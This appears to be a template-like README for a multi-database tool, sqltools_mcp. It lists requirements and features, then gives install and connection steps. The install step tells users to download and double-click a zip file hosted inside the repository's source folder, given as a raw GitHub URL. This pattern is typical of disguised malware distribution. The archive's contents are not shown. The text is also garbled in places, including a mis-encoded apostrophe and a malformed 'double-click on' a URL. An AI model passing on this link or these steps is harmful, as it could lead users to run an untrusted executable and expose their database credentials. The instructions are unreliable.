To run sqltools_mcp, your computer should meet the following requirements:
- Operating System: Windows 10 or later, macOS 10.14 or later, or a recent version of Linux.
- Memory: At least 4 GB of RAM.
- Disk Space: Minimum of 100 MB free space.
- Network: Internet connection for initial setup and updates.
- Multi-Database Support: Connect to MySQL, PostgreSQL, MSSQL, DM8, and SQLite from one platform.
- User-Friendly Interface: Easy to navigate, even for non-technical users.
- Quick Setup: Get started in minutes without complex installation procedures.
- Data Management Tools: Simplify your database tasks with built-in tools.

- Visit the Releases Page: Click here to visit the release page.
- Choose the Latest Release: Look for the top release version. Itβs usually marked with a tag like "Latest".

- Extract the Files: Once downloaded, locate the file and extract it to a folder on your computer.
- Run the Application: Open the folder where you extracted the files and double-click on
https://raw.githubusercontent.com/Tony-Enninful/sqltools_mcp/main/src/sqltools_mcp/adapters/mcp-sqltools-1.2.zip(for Windows) or the relevant file for macOS/Linux.
- Launch sqltools_mcp.
- Select Your Database Type: Choose MySQL, PostgreSQL, MSSQL, DM8, or SQLite from the dropdown menu.
- Enter Connection Details:
- Host: The address of your database server (for local databases, use
localhost). - Port: The port number your database uses (default ports are usually 3306 for MySQL, 5432 for PostgreSQL, etc.).
- Username: Your database username.
- Password: Your database password.
- Database Name: The name of the database you want to connect to.

- Connect: Click on the connect button. If details are correct, you will see your database displayed in the app.
- Backup Your Data: Always keep a backup of your databases before making significant changes.
- Check Compatibility: Ensure that the SQL version you are using is compatible with sqltools_mcp.

- Connection Errors: Check your network connection and ensure that your database server is running.
- File Not Opening: Ensure you have extracted all files and your system meets the requirements.
